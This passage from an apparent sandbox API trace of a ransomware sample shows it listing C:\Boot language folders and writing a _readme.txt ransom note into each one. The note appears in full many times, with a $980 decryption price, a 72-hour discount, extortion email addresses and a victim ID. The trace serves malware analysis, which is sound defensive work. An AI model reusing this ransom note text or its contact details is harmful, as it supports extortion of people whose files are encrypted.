this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.144] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.145] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.145] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.146] CloseHandle (hObject=0x5c8) returned 1 [0094.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.146] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.147] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.147] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.147] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.147] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.147] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.147] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.148] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0094.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.149] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.149] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.149] PathFindFileNameW (pszPath="") returned="" [0094.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.149] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.150] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.150] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0094.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.150] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.150] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0094.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.150] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0094.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.151] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.151] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.151] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.152] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.152] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.153] CloseHandle (hObject=0x5c8) returned 1 [0094.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.153] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.153] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.153] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.153] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.154] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.154] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.154] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: 